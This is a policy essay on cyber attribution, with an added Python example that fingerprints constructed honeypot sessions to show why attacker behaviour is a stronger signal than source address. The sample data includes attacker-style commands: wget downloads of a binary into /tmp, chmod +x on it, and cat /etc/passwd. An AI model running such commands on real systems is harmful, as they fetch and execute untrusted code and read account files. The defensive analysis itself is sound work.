The Evolution of Cyber Attribution


Cyber attribution seeks to determine who is responsible for a cyberspace operation. As with real-world violence, attribution involves both technical and political assessment. Technical methods include analysis of malware and of operational routines that tie cyber effect operations to known actors. Political methods are closely aligned with intelligence collection and analysis, and with the decisions that follow about whether or not to attribute an operation publicly.

Despite these similarities, attributing cyberspace operations is not quite the same as attributing physical attacks. Most importantly, actors are far more capable of hiding their identities in cyberspace. They can impersonate other computers, route traffic through virtual private networks to complicate surveillance, or hijack other devices and operate through them. A significant operation can also remain undiscovered for a long time: the SolarWinds campaign ran for roughly nine months before FireEye disclosed it in December 2020.

The process is especially difficult when policymakers demand very precise attribution. In some cases it is not enough to point the finger at a rival state, especially if the goal is to build a legal case or to share the kind of evidence that will convince partners to work together against a common threat. Highly specific attribution traces an attack back to particular malware, machines, individuals, and organizations. Such details are difficult to acquire, and they may require a combination of reverse engineering, law enforcement investigation, and intelligence.

JD Work, a professor at the National Defense University, described to me some of the pitfalls that can arise while increasing specificity. He stressed that analysts must be humble about the weight of inference from any piece of information. It takes time and persistence to accumulate enough data to offer a confident attribution. While traditional intelligence faces similar issues, attribution of cyber operations has additional challenges because of the opportunities to mask one’s own identity or appear as someone else.

The requirements of attribution depend on the type of cyberspace operation in question. The severity of an operation changes policymakers' calculations about how many resources they are willing to spend on attributing it. Operations that cause significant damage, such as sabotage, are more likely to receive significant investment. However, policymakers often cannot tell what level of investment is warranted, because the tactics, techniques, and procedures (TTPs) of the early stages of an intrusion look much the same whether the goal is espionage or destruction; the intent only becomes clear once a payload has been activated. This limits the ability of states to decide on resource investment before an operation's effects have become visible.

Observers have raised important concerns about delayed attribution and misattribution. The ability to hide and disguise malware sometimes makes it difficult for technical specialists to reach conclusions with high confidence. The process takes longer when officials worry about improper attribution. Such concerns have a long history. In 1998, for example, hackers took control of more than 500 government and private computer systems. The Clinton administration suspected Iraq was responsible, given the event's proximity to U.S. strikes on Baghdad. However, the culprits turned out to be two teenagers from California and one from Israel. Despite these concerns, there have also been many successful examples of cyber attribution. The Obama administration blamed North Korea for hacking Sony Pictures in 2014, and the Mueller Report found Russia responsible for hacking Hillary Clinton's presidential campaign in 2016. The battle between clandestine hackers and cyber defense is not one-sided.

Government and Private Sector Approaches

Indeed, many techniques have been developed to overcome these problems and enable timely and accurate attribution. Technical measures include retaining logs, deploying honeypots, running intrusion detection systems (IDS) or intrusion prevention systems (IPS), surveilling attackers, and tracing the flow of data back toward its origin. There is significant overlap between measures typically used for network defense, such as IDS and IPS, and those used for intelligence purposes. Network defense measures alert administrators to unusual actions or behaviors that may be putting information security at risk. They are critical to recognizing that an operation may be under way, but on their own they cannot establish who is responsible: an alert records a source address and a matched signature, and the address may belong to a VPN exit or a hijacked device rather than to the operator. Technical intelligence such as honeypots, or tracing data flows back toward their origin, lets defenders gather further information about the individuals or groups behind these operations, because it captures how the attacker behaves once inside, which is far harder to disguise than where the traffic appears to come from.
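The script below illustrates the distinction drawn above: an IDS alert stream yields source addresses and rule names, while honeypot session logs yield behaviour that can be fingerprinted independently of the address. This is an added example, not code from the article or from any of the firms it discusses. All alerts, IP addresses (drawn from RFC 5737 documentation ranges), SSH client banners, and commands are constructed; the Suricata-like alert fields and Cowrie-like session fields are assumptions about log shape, not real captures.

```python
"""Constructed example: what an IDS alone tells you about a source, versus
what a honeypot's record of attacker behaviour adds. All data is made up."""
import hashlib
import re
from collections import defaultdict

# Constructed IDS alerts in a Suricata-like shape (assumed field names).
IDS_ALERTS = [
    {"src_ip": "203.0.113.10", "signature": "ET SCAN SSH BruteForce"},
    {"src_ip": "198.51.100.7", "signature": "ET SCAN SSH BruteForce"},
    {"src_ip": "203.0.113.10", "signature": "ET SCAN SSH BruteForce"},
]

# Constructed SSH honeypot sessions in a Cowrie-like shape (assumed fields).
# Sessions 0 and 1 come from different addresses but the same toolkit;
# sessions 0 and 2 share an address (e.g. a VPN exit) but differ in behaviour.
HONEYPOT_SESSIONS = [
    {"src_ip": "203.0.113.10", "client": "SSH-2.0-libssh2_1.9.0",
     "commands": ["uname -a", "cat /proc/cpuinfo",
                  "wget http://203.0.113.99/x86 -O /tmp/.x", "chmod +x /tmp/.x"]},
    {"src_ip": "198.51.100.7", "client": "SSH-2.0-libssh2_1.9.0",
     "commands": ["uname -a", "cat /proc/cpuinfo",
                  "wget http://198.51.100.200/x86 -O /tmp/.y", "chmod +x /tmp/.y"]},
    {"src_ip": "203.0.113.10", "client": "SSH-2.0-OpenSSH_8.9p1",
     "commands": ["w", "cat /etc/passwd", "crontab -l"]},
]


def ids_view(alerts):
    """What an IDS alone provides: which source addresses tripped which rules."""
    view = defaultdict(set)
    for alert in alerts:
        view[alert["src_ip"]].add(alert["signature"])
    return dict(view)


def normalize(command):
    """Replace disposable indicators (download hosts, temp file names) so that
    sessions are compared on tooling behaviour rather than on infrastructure
    an operator can change at will."""
    command = re.sub(r"https?://\S+", "<URL>", command)
    command = re.sub(r"/tmp/\S+", "/tmp/<F>", command)
    return command.strip()


def fingerprint(session):
    """Behavioural fingerprint: client banner plus normalized command sequence.
    Deliberately ignores the source address."""
    sequence = "|".join(normalize(c) for c in session["commands"])
    material = f"{session['client']}\n{sequence}".encode()
    return hashlib.sha256(material).hexdigest()[:16]


def cluster(sessions):
    """Group sessions by fingerprint; the values are the addresses each
    behaviour was observed from."""
    groups = defaultdict(list)
    for session in sessions:
        groups[fingerprint(session)].append(session["src_ip"])
    return dict(groups)


def enrich(alerts, sessions):
    """Join each IDS source address to the behavioural clusters the honeypot
    saw from it. An address with several clusters is probably shared
    infrastructure; one cluster spanning several addresses is probably one
    toolkit used by one actor."""
    by_ip = defaultdict(set)
    for session in sessions:
        by_ip[session["src_ip"]].add(fingerprint(session))
    return {ip: by_ip.get(ip, set()) for ip in ids_view(alerts)}


if __name__ == "__main__":
    print("IDS view:", ids_view(IDS_ALERTS))
    print("Behaviour clusters:", cluster(HONEYPOT_SESSIONS))
    print("Alert sources enriched:", enrich(IDS_ALERTS, HONEYPOT_SESSIONS))
```

Running it shows the two failure modes the paragraph describes: the IDS view lists two addresses with one identical rule hit each, which is no basis for attribution; the honeypot clusters put sessions 0 and 1 together despite their different addresses and split session 2 away from session 0 despite the shared address. Real attribution work layers far more on top of this (malware reversing, infrastructure history, intelligence), but the principle that behaviour is a stronger signal than source address holds.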

Since 2015, the US Government (USG) has presented a variety of approaches to attribution in its strategies. According to the 2015 DoD Cyber Strategy, the Department of Defense (DoD) had "invested heavily" in intelligence, attribution, and warning capabilities. A flurry of federal strategies followed in 2017 and 2018 that touched on attribution, or notably did not: the DoD Cyber Strategy, the National Cyber Strategy, the DHS Cybersecurity Strategy, and the National Security Strategy.

The 2018 DoD Cyber Strategy did not mention attribution at all, despite the strong focus only three years earlier. This is because that strategy aims to "preempt, defeat, or deter malicious cyber activity targeting U.S. critical infrastructure that could cause a significant cyber incident." The National Cyber Strategy centered attribution on strengthening deterrence and prioritized the intelligence community in attributing attacks. The DHS strategy prioritized providing attribution information to those affected by cyber effect operations. Finally, the National Security Strategy placed improving attribution under its "Priority Actions" and echoed the DHS message on intelligence sharing. The 2022 National Security Strategy mentions attribution only in reference to "countering intellectual property theft, forced technology transfer, and other attempts to degrade our technological advantages."

Most recently, the 2023 National Cybersecurity Strategy does not mention attribution by name outside of "diplomatic initiatives attributing disruptive, destructive, or otherwise destabilizing cyber activities." This document prioritizes the response to malicious activity, above all cybercrime, and seems to take knowledge of who is responsible as a given. The differences between these strategies reflect differences in perspective between agencies and between the leaders of a given time. First, although public-private collaboration is stressed in the most recent strategy, the USG and the private sector have different incentives driving their decisions to attribute operations publicly. Aligning those efforts so that they serve the public interest requires work from leaders on both sides. Second, a running theme through these strategies is the role of intelligence, both from the intelligence community and from the private sector, in attribution. While technical methods remain key sources of information, the USG appears to be updating its view to include outside sources of intelligence in its decisions. Finally, each strategy offers a unique insight into the goals, purposes, and priorities of a department, agency, or administration. The work done by DoD differs from that of DHS, and that difference shows in how each wants to support and use attribution. The same is visible between the 2018 and 2023 national cyber strategies, in which attribution has become significantly less of a focus.

The private sector has been instrumental in advancing attribution, and four major firms in particular: CrowdStrike, Mandiant, Microsoft, and Recorded Future. Each handles intelligence differently. CrowdStrike's use of intelligence depends on whether or not it believes an operation to be state-sponsored: it relies exclusively on technical analysis for operations it judges not to be state-sponsored, whereas it includes geopolitical factors for actors that could be. Mandiant does not distinguish between state-sponsored and other actors, focusing instead on intelligence at the tactical, operational, and strategic levels. Microsoft is explicit that it includes geopolitics in its analysis because "there is no organization that can present a politically-neutral and fact-based analysis" when examining accusations of state-sponsored cyber operations. Recorded Future differs from the others by focusing on machine learning and data rather than on political implications. An additional source that CrowdStrike uses is open-source intelligence (OSINT), including the deep and dark web, social media, and underground communities, to gather additional data for attribution. Work noted, however, that OSINT is used by all commercial threat intelligence firms, at least as the US government sees it, because the US government categorizes all intelligence from these entities as OSINT.

Attribution requires collaboration between the public and private sectors because of their complementary strengths. The USG has access to information and tools that are not publicly available, but concerns about protecting its own TTPs and classified sources can make public attribution difficult. Additionally, the USG does not have the same visibility into operations affecting the private sector that firms like those mentioned above have. The private sector can gain a more complete picture of the threat landscape because its corporate relationships ease clients' worries about public disclosure of breaches. The 2023 National Cybersecurity Strategy recognized that this collaboration is critical when it designated Strategic Objective 1.2 as scaling public-private collaboration and Strategic Objective 2.2 as enhancing public-private operational collaboration to disrupt adversaries. Time will tell whether these efforts better coordinate public-private information sharing to reveal those behind cyberspace operations.

Despite the massive amount of information available, institutional factors change the calculus for actors attributing operations publicly. Law enforcement faces the greatest challenges, because of the legal burden of proof required for an indictment, compared with claims made by a private sector company or even a government official. Government officials and private companies have no evidentiary threshold to meet before making statements, whereas federal prosecutors must convince at least twelve members of a grand jury that "a federal crime has probably been committed by the person accused." Prosecutors are also reluctant to bring cases they are not confident they have the evidence to win. These standards raise the barriers for law enforcement to attribute crimes.

While law enforcement faces the highest requirements, political attribution remains far more difficult than the considerations facing private sector actors. Decisionmakers must weigh the benefits of attributing an operation against both the geopolitical implications of doing so and the risk of exposing the use of classified TTPs. Dr. Emily Goldman, Cyber Strategist in the Directorate of Operations at US Cyber Command, told me in an interview that even where an attack could be technically attributed, the decision could be made not to do so in order to preserve TTPs. These decisions become more complicated still when the USG undertakes international collective attribution, in which multiple governments collaborate to attribute an operation publicly.

States may also differ on what level of attribution is necessary. Dr. Goldman discussed that some states may want to know the individual responsible for an attack, as mentioned above, while others are content to say that activity originating from within a state's sovereign territory is enough to place blame on the hosting state. Those holding the latter view would argue that it is a state's responsibility to apprehend the individuals, or to request international assistance if it is incapable of doing so.

In comparison to law enforcement and political decisionmakers, the private sector has the most freedom to attribute cyberspace operations publicly. Despite this apparent freedom, firms still face decisions, specifically regarding attribution in countries where they do business. Work mentioned in his interview that these considerations may lead to more hesitance to attribute in the future, especially as commercial cybersecurity firms are acquired by big tech companies.


Technical and political tools make attribution possible, and public-private collaboration can help improve the speed of discovery. New and unique cyber forensic techniques used by private sector cybersecurity firms may complement official assessments that are supported by other sources of information. That said, public-private collaboration may be hampered by governmental concerns about revealing sources and methods. States and firms each have their own reasons for calling out hackers in public – or keeping their judgments to themselves. These reasons change over time, but public-private collaboration can assist in aligning interests to make the public good a primary motivator. Malicious actors may find it harder to hide as attribution capabilities become more advanced, but the decision to reveal their identities is likely to remain fraught. Decisions about attribution, a highly technical enterprise, often rely on old-fashioned political tradeoffs.
About the Author: 

Jake Sepich is a current graduate student in the School of International Service’s United States Foreign Policy and National Security program. Their research interests include cybersecurity, both in its ethics and how it will affect the future of warfare.